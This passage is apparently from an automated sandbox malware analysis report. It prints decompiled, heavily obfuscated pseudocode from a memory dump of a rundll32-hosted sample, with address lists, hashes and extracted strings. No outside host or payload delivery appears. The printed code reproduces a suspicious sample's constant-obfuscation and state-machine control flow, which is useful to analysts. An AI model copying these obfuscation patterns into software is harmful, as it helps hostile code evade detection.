				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E007BAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}

0x007ab23f
0x007ab240
0x007ab241
0x007ab244
0x007ab247
0x007ab24a
0x007ab24e
0x007ab24f
0x007ab254
0x007ab25e
0x007ab26a
0x007ab271
0x007ab278
0x007ab27f
0x007ab286
0x007ab28d
0x007ab294
0x007ab29b
0x007ab2b3
0x007ab2c1
0x007ab2c6

APIs

lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 007AB2C1

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
Instruction ID: b86735d9914f9d2999a083d9ba7d1459b0487436f765f9ee7f1b31b73464d1dc
Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
Instruction Fuzzy Hash: 66011A72C04608FFDF45DFD4DD469EEBBB5EB44304F108188B90566152E3754B619B61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 007BE395 Relevance: 24.5, Strings: 19, Instructions: 720
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E007BE395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
				signed int _v4;
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _t823;
				void* _t829;
				signed int* _t832;
				signed int _t833;
				signed int _t845;
				signed int _t858;
				signed int _t862;
				intOrPtr _t868;
				signed int _t888;
				void* _t939;
				void* _t948;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t977;
				signed int _t981;
				signed int _t984;
				signed int _t985;
				signed int* _t988;
				void* _t991;

				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_v8 = __edx;
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx & 0x0000ffff);
				E007B20B9(__ecx & 0x0000ffff);
				_v284 = 0x99c43c;
				_t988 =  &(( &_v288)[0xd]);
				_v284 = _v284 + 0xbb14;
				_v284 = _v284 >> 0xb;
				_v284 = _v284 ^ 0x0000134f;
				_t862 = 0;
				_v120 = 0x27310;
				_t977 = 0x329d839;
				_t956 = 0x43;
				_v120 = _v120 / _t956;
				_v120 = _v120 + 0xe2f5;
				_v120 = _v120 ^ 0x0000ec43;
				_v36 = 0x50046c;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x00a00810;
				_v116 = 0x7f268a;
				_v116 = _v116 ^ 0x5f915552;
				_t957 = 0x1b;
				_v276 = 0;
				_v116 = _v116 * 0x3e;
				_v116 = _v116 ^ 0x3bc08e50;
				_v228 = 0xb299e8;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 << 0x10;
				_v228 = _v228 * 0x42;
				_v228 = _v228 ^ 0xb8144000;
				_v64 = 0x620921;
				_v64 = _v64 | 0xbe88b167;
				_v64 = _v64 ^ 0xbeaab967;
				_v172 = 0xae09b0;
				_v172 = _v172 | 0xde677f7d;
				_v172 = _v172 ^ 0xc5d04777;
				_v172 = _v172 ^ 0x1b3b388a;
				_v132 = 0xc06abb;
				_v132 = _v132 ^ 0x2b7b17d1;
				_v132 = _v132 / _t957;
				_v132 = _v132 ^ 0x059ea5d4;
				_v236 = 0x9fdac6;
				_v236 = _v236 >> 4;
				_v236 = _v236 + 0x9b65;
				_v236 = _v236 * 0x7b;
				_v236 = _v236 ^ 0x051f8b2b;
				_v108 = 0xc74878;
				_v108 = _v108 + 0x314b;
				_v108 = _v108 * 0x41;
				_v108 = _v108 ^ 0x32a5e883;
				_v196 = 0x1587ec;
				_v196 = _v196 ^ 0x07496474;
				_v196 = _v196 >> 7;
				_t958 = 0x2c;
				_v196 = _v196 / _t958;
				_v196 = _v196 ^ 0x000054ad;
				_v244 = 0xbebf62;
				_v244 = _v244 << 0xb;
				_v244 = _v244 + 0xffffca16;
				_v244 = _v244 << 0xe;
				_v244 = _v244 ^ 0x36858000;
				_v72 = 0x750de5;
				_v72 = _v72 | 0xb336b270;
				_v72 = _v72 ^ 0xb377bff5;
				_v256 = 0xc175fb;
				_t984 = 0x72;
				_t959 = 0x28;
				_v256 = _v256 * 0x26;
				_v256 = _v256 >> 5;
				_v256 = _v256 ^ 0xfb5a89da;
				_v256 = _v256 ^ 0xfbbf3581;
				_v76 = 0x1a7820;
				_v76 = _v76 | 0xb8d3f172;
				_v76 = _v76 ^ 0xb8dbf96d;
				_v224 = 0x97ff87;
				_v224 = _v224 / _t984;
				_v224 = _v224 >> 6;
				_v224 = _v224 * 0x5d;
				_v224 = _v224 ^ 0x0001effe;
				_v40 = 0x7c0450;
				_v40 = _v40 / _t959;
				_v40 = _v40 ^ 0x000319b6;
				_v136 = 0x260fad;
				_v136 = _v136 + 0x622a;
				_t960 = 0x1c;
				_v136 = _v136 / _t960;
				_v136 = _v136 ^ 0x00015e7e;
				_v288 = 0x61f743;
				_t961 = 0x66;
				_v288 = _v288 * 0x25;
				_v288 = _v288 ^ 0x0e2ee817;
				_v288 = 0x858eca;
				_v288 = _v288 / _t984;
				_v288 = _v288 ^ 0x0002de1a;
				_v280 = 0xcba1b8;
				_v280 = _v280 / _t961;
				_v280 = _v280 ^ 0xc2211053;
				_v280 = _v280 + 0xffff75b7;
				_v280 = _v280 ^ 0xc2279606;
				_v288 = 0x614b46;
				_v288 = _v288 >> 4;
				_v288 = _v288 ^ 0x000cf9c3;
				_v288 = 0x794624;
				_v288 = _v288 + 0xb4d0;
				_v288 = _v288 ^ 0x0072cd5b;
				_v288 = 0xcdbe83;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x00034ad6;
				_v288 = 0x24639d;
				_t962 = 0x28;
				_v288 = _v288 / _t962;
				_v288 = _v288 ^ 0x000e4507;
				_v288 = 0x4730ec;
				_t963 = 0x21;
				_v288 = _v288 / _t963;
				_v288 = _v288 ^ 0x0002fb4b;
				_v284 = 0xb301d9;
				_t964 = 0x4e;
				_v284 = _v284 / _t964;
				_v284 = _v284 + 0x8c1d;
				_v284 = _v284 ^ 0x00061f34;
				_v280 = 0xfdcbf7;
				_v280 = _v280 + 0x27a;
				_v280 = _v280 + 0xffff891b;
				_t965 = 0x46;
				_v280 = _v280 / _t965;
				_v280 = _v280 ^ 0x0008575c;
				_v284 = 0xc1d3a0;
				_v284 = _v284 >> 0xc;
				_v284 = _v284 << 2;
				_v284 = _v284 ^ 0x000b0f76;
				_v112 = 0xeee25;
				_v112 = _v112 << 0xc;
				_v112 = _v112 << 4;
				_v112 = _v112 ^ 0xee2c14e7;
				_v180 = 0x8a49b3;
				_v180 = _v180 | 0xb0d6dc69;
				_v180 = _v180 + 0xffffa02a;
				_v180 = _v180 | 0x7fd27f38;
				_v180 = _v180 ^ 0xffd81443;
				_v152 = 0x628374;
				_v152 = _v152 >> 2;
				_v152 = _v152 + 0xffff73d9;
				_t966 = 0x2e;
				_v152 = _v152 / _t966;
				_v152 = _v152 ^ 0x0001ef4a;
				_v28 = 0xe4a1af;
				_v28 = _v28 + 0x32bc;
				_v28 = _v28 ^ 0x00ec33da;
				_v160 = 0x595a50;
				_v160 = _v160 + 0xffffdbfa;
				_v160 = _v160 + 0xffffb344;
				_t967 = 0x36;
				_v160 = _v160 / _t967;
				_v160 = _v160 ^ 0x0006861f;
				_v88 = 0x4d7ad3;
				_v88 = _v88 + 0xc28a;
				_v88 = _v88 ^ 0x004ca34c;
				_v48 = 0xf1782b;
				_v48 = _v48 ^ 0xe8a77c51;
				_v48 = _v48 ^ 0xe85593aa;
				_v100 = 0x42ea8e;
				_t985 = 0x2a;
				_v100 = _v100 / _t985;
				_v100 = _v100 ^ 0x000caa85;
				_v148 = 0xa48e68;
				_t968 = 6;
				_v148 = _v148 / _t968;
				_v148 = _v148 << 0xc;
				_v148 = _v148 ^ 0xb6d58e9e;
				_v252 = 0x4ff2e7;
				_t969 = 0xc;
				_v252 = _v252 / _t969;
				_v252 = _v252 << 6;
				_v252 = _v252 << 0xc;
				_v252 = _v252 ^ 0xa6466867;
				_v80 = 0x4d7637;
				_v80 = _v80 + 0xd199;
				_v80 = _v80 ^ 0x004dfa45;
				_v24 = 0xfee4b3;
				_t970 = 0x3e;
				_v24 = _v24 * 0x23;
				_v24 = _v24 ^ 0x22d37c34;
				_v204 = 0x24209;
				_v204 = _v204 + 0xffffcebc;
				_v204 = _v204 ^ 0x847f2e61;
				_v204 = _v204 + 0xffff5302;
				_v204 = _v204 ^ 0x847f4f7c;
				_v260 = 0x4a587;
				_v260 = _v260 * 0x4a;
				_v260 = _v260 + 0xffff9bf3;
				_v260 = _v260 + 0xffff92e5;
				_v260 = _v260 ^ 0x015b504d;
				_v164 = 0x6d05db;
				_v164 = _v164 * 0x14;
				_v164 = _v164 >> 4;
				_v164 = _v164 ^ 0x556abaa4;
				_v164 = _v164 ^ 0x55e01079;
				_v20 = 0x80cc5b;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000efc86;
				_v104 = 0xc8e6e2;
				_v104 = _v104 << 8;
				_v104 = _v104 >> 0x10;
				_v104 = _v104 ^ 0x000afff3;
				_v272 = 0x560e69;
				_v272 = _v272 + 0x2793;
				_v272 = _v272 * 0xe;
				_v272 = _v272 + 0xc902;
				_v272 = _v272 ^ 0x04bc6edc;
				_v16 = 0xfcaf67;
				_v16 = _v16 / _t970;
				_v16 = _v16 ^ 0x000c0ba9;
				_v56 = 0x81a14f;
				_v56 = _v56 >> 0xb;
				_v56 = _v56 ^ 0x000fb9cd;
				_v32 = 0x24333c;
				_v32 = _v32 / _t985;
				_v32 = _v32 ^ 0x00065bee;
				_v124 = 0xe3a445;
				_v124 = _v124 >> 5;
				_v124 = _v124 >> 7;
				_v124 = _v124 ^ 0x0000dfdf;
				_v220 = 0x5f21d9;
				_t971 = 0x79;
				_v220 = _v220 * 0x54;
				_v220 = _v220 << 5;
				_v220 = _v220 ^ 0x0e372a7b;
				_v220 = _v220 ^ 0xe8dc9c41;
				_v188 = 0xc44d01;
				_v188 = _v188 ^ 0x0373dd04;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0xfb03bbf0;
				_v188 = _v188 ^ 0x496460ca;
				_v268 = 0x8213af;
				_v268 = _v268 ^ 0x6d9501b2;
				_v268 = _v268 | 0x4d165578;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x06d55fab;
				_v212 = 0x705526;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 << 9;
				_v212 = _v212 >> 8;
				_v212 = _v212 ^ 0x000b72c4;
				_v92 = 0xc8093b;
				_v92 = _v92 + 0xd043;
				_v92 = _v92 ^ 0x00ca3bde;
				_v264 = 0x1f9619;
				_v264 = _v264 + 0xffffbc34;
				_v264 = _v264 * 0x3e;
				_v264 = _v264 * 0x52;
				_v264 = _v264 ^ 0x6e0edc82;
				_v96 = 0x6d9960;
				_v96 = _v96 | 0x9fb7a8f9;
				_v96 = _v96 ^ 0x9ff35e32;
				_v144 = 0x447df2;
				_v144 = _v144 << 8;
				_v144 = _v144 + 0xffff6cb2;
				_v144 = _v144 ^ 0x44714589;
				_v240 = 0x65db08;
				_v240 = _v240 * 6;
				_v240 = _v240 + 0x5f97;
				_v240 = _v240 >> 0xd;
				_v240 = _v240 ^ 0x000293b4;
				_v84 = 0x3c7c20;
				_v84 = _v84 ^ 0x2c3d49c2;
				_v84 = _v84 ^ 0x2c080053;
				_v248 = 0x13c85;
				_v248 = _v248 + 0x8cd8;
				_v248 = _v248 + 0x6e3d;
				_v248 = _v248 ^ 0xe59eace5;
				_v248 = _v248 ^ 0xe5984999;
				_v216 = 0x6164ef;
				_v216 = _v216 << 6;
				_v216 = _v216 + 0xffff2edc;
				_v216 = _v216 | 0xa66c888f;
				_v216 = _v216 ^ 0xbe7947d5;
				_v232 = 0x991e82;
				_v232 = _v232 + 0xffff48fb;
				_v232 = _v232 >> 0xe;
				_v232 = _v232 | 0x69e4ac2c;
				_v232 = _v232 ^ 0x69ef7d1b;
				_v68 = 0x9d94b2;
				_v68 = _v68 | 0xcead792c;
				_v68 = _v68 ^ 0xceb9e800;
				_v44 = 0x20071e;
				_v44 = _v44 / _t971;
				_v44 = _v44 ^ 0x000a654c;
				_v128 = 0x223cb7;
				_v128 = _v128 + 0x9bf0;
				_v128 = _v128 | 0x79b7d361;
				_v128 = _v128 ^ 0x79b3b147;
				_v52 = 0x8ed203;
				_v52 = _v52 + 0xffff1a7b;
				_v52 = _v52 ^ 0x008be8c4;
				_v208 = 0xe0ac17;
				_v208 = _v208 ^ 0xbcfe8cf2;
				_t972 = 0x6b;
				_v208 = _v208 / _t972;
				_v208 = _v208 | 0x3ee9ec5f;
				_v208 = _v208 ^ 0x3fec9c1d;
				_v192 = 0x219bfa;
				_v192 = _v192 >> 4;
				_v192 = _v192 + 0x77e4;
				_v192 = _v192 | 0x2fb4141c;
				_v192 = _v192 ^ 0x2fb2076e;
				_v200 = 0x8926e2;
				_v200 = _v200 << 4;
				_t973 = 0xc;
				_v200 = _v200 / _t973;
				_v200 = _v200 + 0xffff5704;
				_v200 = _v200 ^ 0x00bbfbcc;
				_v284 = 0xaed0cb;
				_v284 = _v284 + 0x9c17;
				_v284 = _v284 + 0xaf6d;
				_v284 = _v284 ^ 0x00b89bc1;
				_v168 = 0x914ce9;
				_v168 = _v168 | 0xceb3d4af;
				_v168 = _v168 ^ 0x5adaba1c;
				_v168 = _v168 ^ 0x3c292fbf;
				_v168 = _v168 ^ 0xa84ea968;
				_v156 = 0x90c891;
				_v156 = _v156 + 0xffff3667;
				_t974 = 0x5c;
				_v156 = _v156 / _t974;
				_t975 = 0x3c;
				_v156 = _v156 / _t975;
				_v156 = _v156 ^ 0x000da682;
				_v140 = 0xffcb83;
				_v140 = _v140 << 0xd;
				_v140 = _v140 | 0xcebab625;
				_v140 = _v140 ^ 0xfff71570;
				_v280 = 0xfef1ee;
				_v280 = _v280 >> 8;
				_v280 = _v280 + 0xffff306e;
				_v280 = _v280 | 0x3331510b;
				_v280 = _v280 ^ 0x3338227a;
				_v176 = 0xc7331d;
				_v176 = _v176 >> 7;
				_v176 = _v176 + 0x1d50;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x00370898;
				_v288 = 0x519041;
				_v288 = _v288 + 0x7cd9;
				_v288 = _v288 ^ 0x0057f5a9;
				_t976 = _v12;
				_t986 = _v12;
				while(1) {
					L1:
					_t939 = 0x68a9e90;
					while(1) {
						_t823 = _v184;
						while(1) {
							L3:
							_t991 = _t977 - _t939;
							if(_t991 > 0) {
								break;
							}
							if(_t991 == 0) {
								__eflags =  *_v8;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v20);
									_t868 = E007BDCF7(_v164, 0x7a1524, __eflags);
									_v276 = _t868;
								}
								_t845 = _v244 | _v196 | _v108 | _v236 | _v132 | _v172 | _v64 | _v228 | _v116;
								_t981 = _a44 & 1;
								__eflags = _t981;
								if(_t981 != 0) {
									__eflags = _t845;
								}
								_push(_t868);
								_t976 = E007A75FA(_t868, _t845, _v272, _t868, _v16, _a16, _v56, _v32, _v124, _t868, _v220, _v188, _v184);
								E007AA8B0(_v268, _v276, _v212);
								_t988 =  &(_t988[0xe]);
								__eflags = _t976;
								if(_t976 == 0) {
									_t977 = 0x51daea9;
								} else {
									_push(_v96);
									_push(_v264);
									_push(_v256);
									_v60 = 1;
									_push( &_v60);
									_push(_v92);
									_t948 = 4;
									E007A9670(_t976, _t948);
									_t988 =  &(_t988[5]);
									__eflags = _t981;
									if(_t981 != 0) {
										E007B408E( &_v12, _v76, _v144, _v240, _t976,  &_v60, _v84, _v248);
										_t732 =  &_v60;
										 *_t732 = _v60 | _v136;
										__eflags =  *_t732;
										E007A9670(_t976, _v12, _v216,  &_v60, _v224, _v232, _v68);
										_t988 =  &(_t988[0xb]);
									}
									_t977 = 0xbee37f5;
								}
								L11:
								_t868 = _v276;
								goto L1;
							}
							if(_t977 == 0x2602436) {
								_t977 = 0x506ebc3;
								continue;
							}
							if(_t977 == 0x329d839) {
								_t977 = 0x2602436;
								continue;
							}
							if(_t977 == 0x4bb42fe) {
								_t823 = E007A88C3(_v100, _v148, _v40, _t868, _t868, _t986, _v252, _v80, _a36, _v24, _t868, _v4, _t868, _v204, _v260);
								_t868 = _v276;
								_t988 =  &(_t988[0xd]);
								__eflags = _t823;
								_v184 = _t823;
								_t939 = 0x68a9e90;
								_t977 =  !=  ? 0x68a9e90 : 0x9a35046;
								continue;
							}
							if(_t977 == 0x506ebc3) {
								_push(_t868);
								_push(_v72);
								_push(_v160);
								_push(_v28);
								_push(_v152);
								_t858 = E007BDAC6(_v112, _v180);
								_t986 = _t858;
								__eflags = _t858;
								_t977 =  !=  ? 0x4bb42fe : 0xdf8c541;
								E007B8519(_v88, _v48, 0);
								_t988 = _t988 - 0xc + 0x24;
								L37:
								_t868 = _v276;
								_t939 = 0x68a9e90;
								L38:
								__eflags = _t977 - 0xdf8c541;
								if(_t977 == 0xdf8c541) {
									L41:
									return _t862;
								}
								_t823 = _v184;
								continue;
							}
							if(_t977 != 0x51daea9) {
								goto L38;
							}
							E007A2B62(_v168, _t823, _v156, _v140);
							_t977 = 0x9a35046;
							goto L11;
						}
						__eflags = _t977 - 0x81a6b17;
						if(_t977 == 0x81a6b17) {
							E007A2B62(_v192, _t976, _v200, _v284);
							_t977 = 0x51daea9;
							goto L37;
						}
						__eflags = _t977 - 0x9a35046;
						if(_t977 == 0x9a35046) {
							E007A2B62(_v280, _t986, _v176, _v288);
							goto L41;
						}
						__eflags = _t977 - 0xb70b8d2;
						if(_t977 == 0xb70b8d2) {
							__eflags = E007BA2E8(_t976, _a4);
							_t977 = 0x81a6b17;
							_t829 = 1;
							_t862 =  !=  ? _t829 : _t862;
							goto L11;
						}
						__eflags = _t977 - 0xba06d79;
						if(__eflags == 0) {
							__eflags = E007C09B5(_t976, _v120, __eflags) - _v36;
							_t977 =  ==  ? 0xb70b8d2 : 0x81a6b17;
							goto L11;
						}
						__eflags = _t977 - 0xbee37f5;
						if(_t977 != 0xbee37f5) {
							goto L38;
						}
						_t832 = _v8;
						_t888 =  *_t832;
						__eflags = _t888;
						if(_t888 == 0) {
							_t833 = 0;
							__eflags = 0;
						} else {
							_t833 = _t832[1];
						}
						E007A2AE4(_v44, _t888, _t888, _a24, _t976, _v52, _t833, _v208);
						_t988 =  &(_t988[7]);
						asm("sbb esi, esi");
						_t977 = (_t977 & 0x03860262) + 0x81a6b17;
						goto L11;
					}
				}
			}

0x007be39f
0x007be3a8
0x007be3af
0x007be3b6
0x007be3bd
0x007be3c4
0x007be3cb
0x007be3d2
0x007be3d9
0x007be3e0
0x007be3e7
0x007be3ee
0x007be3f5
0x007be3fc
0x007be400
0x007be401
0x007be406
0x007be40e
0x007be411
0x007be41b
0x007be422
0x007be42a
0x007be42c
0x007be437
0x007be445
0x007be44a
0x007be453
0x007be45e
0x007be469
0x007be474
0x007be47b
0x007be486
0x007be491
0x007be4a4
0x007be4a5
0x007be4a9
0x007be4b0
0x007be4bb
0x007be4c3
0x007be4c8
0x007be4d2
0x007be4d6
0x007be4de
0x007be4e9
0x007be4f4
0x007be4ff
0x007be50a
0x007be515
0x007be520
0x007be52b
0x007be536
0x007be54a
0x007be551
0x007be55c
0x007be564
0x007be569
0x007be576
0x007be57a
0x007be582
0x007be58d
0x007be5a0
0x007be5a7
0x007be5b2
0x007be5bc
0x007be5c4
0x007be5cf
0x007be5d4
0x007be5d8
0x007be5e0
0x007be5e8
0x007be5ed
0x007be5f5
0x007be5fa
0x007be602
0x007be60d
0x007be618
0x007be623
0x007be632
0x007be635
0x007be636
0x007be63a
0x007be63f
0x007be647
0x007be64f
0x007be65a
0x007be665
0x007be670
0x007be680
0x007be684
0x007be690
0x007be694
0x007be69c
0x007be6b2
0x007be6b9
0x007be6c4
0x007be6cf
0x007be6e1
0x007be6e6
0x007be6ed
0x007be6f8
0x007be707
0x007be708
0x007be70c
0x007be714
0x007be724
0x007be728
0x007be730
0x007be73e
0x007be742
0x007be74a
0x007be752
0x007be75a
0x007be762
0x007be767
0x007be76f
0x007be777
0x007be77f
0x007be787
0x007be791
0x007be796
0x007be79e
0x007be7ac
0x007be7b1
0x007be7b7
0x007be7bf
0x007be7cb
0x007be7d0
0x007be7d6
0x007be7de
0x007be7ea
0x007be7ef
0x007be7f5
0x007be7fd
0x007be805
0x007be80d
0x007be815
0x007be821
0x007be826
0x007be82c
0x007be834
0x007be83c
0x007be841
0x007be846
0x007be84e
0x007be859
0x007be861
0x007be869
0x007be874
0x007be87f
0x007be88a
0x007be895
0x007be8a0
0x007be8ab
0x007be8b6
0x007be8be
0x007be8d0
0x007be8d5
0x007be8de
0x007be8e9
0x007be8f4
0x007be8ff
0x007be90a
0x007be915
0x007be920
0x007be932
0x007be935
0x007be93c
0x007be947
0x007be952
0x007be95d
0x007be968
0x007be973
0x007be97e
0x007be989
0x007be99f
0x007be9a4
0x007be9ab
0x007be9b6
0x007be9ca
0x007be9cf
0x007be9d6
0x007be9de
0x007be9e9
0x007be9f7
0x007be9fc
0x007bea00
0x007bea05
0x007bea0a
0x007bea12
0x007bea1d
0x007bea28
0x007bea33
0x007bea48
0x007bea49
0x007bea50
0x007bea5b
0x007bea63
0x007bea6b
0x007bea73
0x007bea7b
0x007bea83
0x007bea90
0x007bea94
0x007bea9c
0x007beaa4
0x007beaac
0x007beabf
0x007beac6
0x007beace
0x007bead9
0x007beae4
0x007beaef
0x007beaf7
0x007beb02
0x007beb0d
0x007beb15
0x007beb1d
0x007beb28
0x007beb30
0x007beb3d
0x007beb41
0x007beb49
0x007beb51
0x007beb67
0x007beb6e
0x007beb79
0x007beb84
0x007beb8c
0x007beb97
0x007bebab
0x007bebb2
0x007bebbd
0x007bebc8
0x007bebd2
0x007bebda
0x007bebe5
0x007bebf4
0x007bebf5
0x007bebf9
0x007bebfe
0x007bec06
0x007bec0e
0x007bec16
0x007bec23
0x007bec27
0x007bec2f
0x007bec37
0x007bec3f
0x007bec47
0x007bec4f
0x007bec54
0x007bec5c
0x007bec64
0x007bec69
0x007bec6e
0x007bec73
0x007bec7b
0x007bec86
0x007bec91
0x007bec9c
0x007beca4
0x007becb1
0x007becba
0x007becbe
0x007becc6
0x007becd1
0x007becdc
0x007bece7
0x007becf2
0x007becfa
0x007bed05
0x007bed10
0x007bed1d
0x007bed21
0x007bed29
0x007bed2e
0x007bed36
0x007bed41
0x007bed4c
0x007bed57
0x007bed5f
0x007bed67
0x007bed6f
0x007bed77
0x007bed7f
0x007bed87
0x007bed8c
0x007bed94
0x007bed9c
0x007beda4
0x007bedac
0x007bedb4
0x007bedb9
0x007bedc1
0x007bedc9
0x007bedd4
0x007beddf
0x007bedea
0x007bedfe
0x007bee05
0x007bee10
0x007bee1b
0x007bee26
0x007bee31
0x007bee3c
0x007bee49
0x007bee54
0x007bee5f
0x007bee67
0x007bee75
0x007bee7a
0x007bee80
0x007bee88
0x007bee90
0x007bee98
0x007bee9d
0x007beea5
0x007beead
0x007beeb5
0x007beebd
0x007beec6
0x007beecb
0x007beed1
0x007beed9
0x007beee1
0x007beee9
0x007beef1
0x007beef9
0x007bef01
0x007bef0c
0x007bef17
0x007bef22
0x007bef2d
0x007bef38
0x007bef43
0x007bef55
0x007bef5a
0x007bef6a
0x007bef6d
0x007bef74
0x007bef7f
0x007bef8a
0x007bef92
0x007bef9d
0x007befa8
0x007befb0
0x007befb5
0x007befbd
0x007befc5
0x007befcd
0x007befd8
0x007befe0
0x007befeb
0x007beff3
0x007beffe
0x007bf006
0x007bf00e
0x007bf016
0x007bf01d
0x007bf024
0x007bf024
0x007bf024
0x007bf029
0x007bf029
0x007bf02d
0x007bf02d
0x007bf02d
0x007bf02f
0x00000000
0x00000000
0x007bf035
0x007bf17e
0x007bf181
0x007bf183
0x007bf18f
0x007bf1a4
0x007bf1a6
0x007bf1a6
0x007bf1e0
0x007bf1e7
0x007bf1e7
0x007bf1e9
0x007bf1eb
0x007bf1eb
0x007bf1f0
0x007bf237
0x007bf23d
0x007bf242
0x007bf245
0x007bf247
0x007bf2ff
0x007bf24d
0x007bf24d
0x007bf258
0x007bf25d
0x007bf261
0x007bf26f
0x007bf270
0x007bf279
0x007bf27a
0x007bf27f
0x007bf282
0x007bf284
0x007bf2b3
0x007bf2c8
0x007bf2c8
0x007bf2c8
0x007bf2ed
0x007bf2f2
0x007bf2f2
0x007bf2f5
0x007bf2f5
0x007bf096
0x007bf096
0x00000000
0x007bf096
0x007bf041
0x007bf16d
0x00000000
0x007bf16d
0x007bf04d
0x007bf163
0x00000000
0x007bf163
0x007bf059
0x007bf13f
0x007bf144
0x007bf148
0x007bf14b
0x007bf14d
0x007bf156
0x007bf15b
0x00000000
0x007bf15b
0x007bf065
0x007bf09c
0x007bf09d
0x007bf0a4
0x007bf0ab
0x007bf0b5
0x007bf0ca
0x007bf0d6
0x007bf0df
0x007bf0ed
0x007bf0f0
0x007bf0f5
0x007bf3fa
0x007bf3fa
0x007bf3fe
0x007bf403
0x007bf403
0x007bf409
0x007bf42b
0x007bf434
0x007bf434
0x007bf029
0x00000000
0x007bf029
0x007bf06d
0x00000000
0x00000000
0x007bf08a
0x007bf091
0x00000000
0x007bf091
0x007bf309
0x007bf30f
0x007bf3ee
0x007bf3f5
0x00000000
0x007bf3f5
0x007bf315
0x007bf31b
0x007bf421
0x00000000
0x007bf427
0x007bf326
0x007bf328
0x007bf3ce
0x007bf3d0
0x007bf3d7
0x007bf3d8
0x00000000
0x007bf3d8
0x007bf32e
0x007bf334
0x007bf3b1
0x007bf3b8
0x00000000
0x007bf3b8
0x007bf336
0x007bf33c
0x00000000
0x00000000
0x007bf342
0x007bf349
0x007bf34b
0x007bf34d
0x007bf354
0x007bf354
0x007bf34f
0x007bf34f
0x007bf34f
0x007bf37a
0x007bf37f
0x007bf384
0x007bf38c
0x00000000
0x007bf38c
0x007bf029

Strings

_>, xrefs: 007BEE80
K1, xrefs: 007BE58D
C, xrefs: 007BE45E
z"83, xrefs: 007BEFC5
$Fy, xrefs: 007BE76F
Le, xrefs: 007BEE05
*b, xrefs: 007BE6CF
u, xrefs: 007BE602
7vM, xrefs: 007BEA12
|<, xrefs: 007BED36
S, xrefs: 007BED4C
&Up, xrefs: 007BEC5C
da, xrefs: 007BED7F
=n, xrefs: 007BED67
<3$, xrefs: 007BEB97
w, xrefs: 007BEE9D
0G, xrefs: 007BE7BF
PZY, xrefs: 007BE90A
!b, xrefs: 007BE4DE

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: |<$!b$$Fy$&Up$*b$7vM$<3$$=n$C$K1$Le$PZY$S$_>$z"83$u$0G$da$w
API String ID: 0-3417817227
Opcode ID: 02f93e4b8124e57df4880740d4322ec26d27821492375eaa35625f02d4657220
Instruction ID: 5beabbde5337cb064283efba849ec1485a522296dcb6c80cf8d92697088393f3
